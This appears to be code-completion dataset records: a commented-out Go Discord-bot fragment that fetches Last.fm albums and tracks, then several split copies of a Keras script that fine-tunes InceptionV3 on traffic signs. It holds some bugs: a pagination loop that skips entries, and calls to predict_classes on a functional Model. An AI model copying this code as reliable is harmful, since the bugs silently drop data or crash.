// for i, track := range tracks {
// if i < len(tracks) && i < 4 {
// pos := trackPositions[i]
// dc.SetRGB(0.9, 0.9, 0.9)
// dc.LoadFontFace(FontRegular, 16)
// dc.DrawString(lib.ShortStr(track.Name, 15), pos.X, pos.Y)
// dc.LoadFontFace(FontBold, 16)
// dc.DrawString(fmt.Sprintf("%s plays", track.PlayCount), pos.Plays.X, pos.Plays.Y)
// }
// }
// lib.BrandImage(dc) // brand image
// dc.SavePNG(lib.LocGet("temp/" + ctx.Message.Author.ID.String() + "_band.png"))
// r, _ := os.Open(lib.LocGet("temp/" + ctx.Message.Author.ID.String() + "_band.png"))
// ctx.Atlas.CreateMessage(ctx.Message.ChannelID, &disgord.CreateMessageParams{
// Files: []disgord.CreateMessageFileParams{
// {
// FileName: r.Name(),
// Reader: r,
// },
// },
// })
// r.Close()
// os.Remove(lib.LocGet("temp/" + ctx.Message.Author.ID.String() + "_band.png"))
// }
// // getArtistInfo retrieves artist info for a given user.
// func (c Band) getArtistInfo(artist string, user *disgord.User) (lastfm.ArtistGetInfo, error) {
// dbu := database.GetUser(user)
// return c.Lastfm.Artist.GetInfo(lastfm.P{"artist": artist, "username": dbu.Lastfm})
// }
// // getAlbumsList gets albums for a user for a given artist.
// func (c Band) getAlbumsList(ctx atlas.Context, artist lastfm.ArtistGetInfo) []fm.TopAlbum {
// user := database.GetUser(ctx.Message.Author)
// // kinda gotta get as many albums as possible. we'll use totalPages to make more queries if need be
// 	alist, _ := c.Lastfm.User.GetTopAlbums(lastfm.P{"user": user.Lastfm, "limit": "1000"}) // limit max = 1000
// 	var albums = []fm.TopAlbum{}
// // add first batch of albums for artist into slice
// for _, album := range alist.Albums {
// if album.Artist.Name == artist.Name {
// albums = append(albums, album)
// }
// }
// // if more pages than 1, run another sweep
// if alist.TotalPages > 1 {
// for i := 1; i <= alist.TotalPages; i++ {
// al, _ := c.Lastfm.User.GetTopAlbums(lastfm.P{"user": user.Lastfm, "limit": "1000", "page": strconv.Itoa(i)})
// // add more albums for artist into slice
// if al.Albums[i].Artist.Name == artist.Name {
// albums = append(albums, al.Albums[i])
// }
// }
// }
// return albums
// }
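// Note (descriptive): GetTopAlbums is requested with the 1000-album page cap, and the
// extra-page loop above only inspects entry i of each additional page, so libraries that
// span several pages may have some of this artist's albums skipped.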
// // getTracksList gets the users top tracks for a given artist.
// func (c Band) getTracksList(ctx atlas.Context, artist lastfm.ArtistGetInfo) ([]fm.TopTrack, error) {
// // this method works like getAlbumsList, won't comment
// user := database.GetUser(ctx.Message.Author)
// tlist, _ := c.Lastfm.User.GetTopTracks(lastfm.P{"user": user.Lastfm, "limit": "1000"})
// var tracks = []fm.TopTrack{}
// for _, track := range tlist.Tracks {
// if track.Artist.Name == artist.Name {
// tracks = append(tracks, track)
// }
// }
// if tlist.TotalPages > 1 {
// for i := 1; i <= tlist.TotalPages; i++ {
// tl, err := c.Lastfm.User.GetTopTracks(lastfm.P{"user": user.Lastfm, "limit": "1000", "page": strconv.Itoa(i)})
// if err != nil {
// 				return nil, errors.New("An error occurred while trying to retrieve this info. Please try again later")
// }
// if tl.Tracks[i].Artist.Name == artist.Name {
// tracks = append(tracks, tl.Tracks[i])
// }
// }
// }
// return tracks, nil
// }
fine_tune_Inception.py
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def on_epoch_end(self, batch, logs={}):
self.acc.append(logs.get('acc'))
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
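# Example invocation and resulting artefact names (values purely illustrative):
#   python fine_tune_Inception.py 0.5 0.001 10
# sets dropout_rate=0.5, lr=0.001, batch_size=10 and writes the best weights to
# 'vgg16_weights_frac_0_3_lr_0.001_batch10_drop_0.5_epochs_30.h5' (the vgg16_ prefix is a
# leftover from the VGG16 script this was adapted from).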
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
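# For example, conv2d_bn(x, 64, 3, 3) is a 64-filter 3x3 ReLU convolution followed by
# BatchNormalization over axis 1, i.e. channels-first / Theano dim ordering, which
# matches the (channel, rows, cols) Input used below.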
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i))
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
    return model
def lr_schedule(epoch):  # returns the learning rate to use for the given epoch index
return lr*(0.1**int(epoch/10))
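# With the command-line lr this gives: epochs 0-9 -> lr, epochs 10-19 -> lr*0.1,
# epochs 20-29 -> lr*0.01 (the rate drops by a factor of 10 every 10 epochs).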
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
    y_pred = np.argmax(model.predict(X_valid), axis=1)  # the functional-API Model has no predict_classes
print("Predictions: ", y_pred)
    print("Metric names: ", model.metrics_names)
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!") | random_line_split |
|
fine_tune_Inception.py |
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def | (self, batch, logs={}):
self.acc.append(logs.get('acc'))
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i))
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
y_pred= model.predict_classes(X_valid)
print("Predictions: ", y_pred)
model.metrics_names
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!")
| on_epoch_end | identifier_name |
fine_tune_Inception.py |
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def on_epoch_end(self, batch, logs={}):
|
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
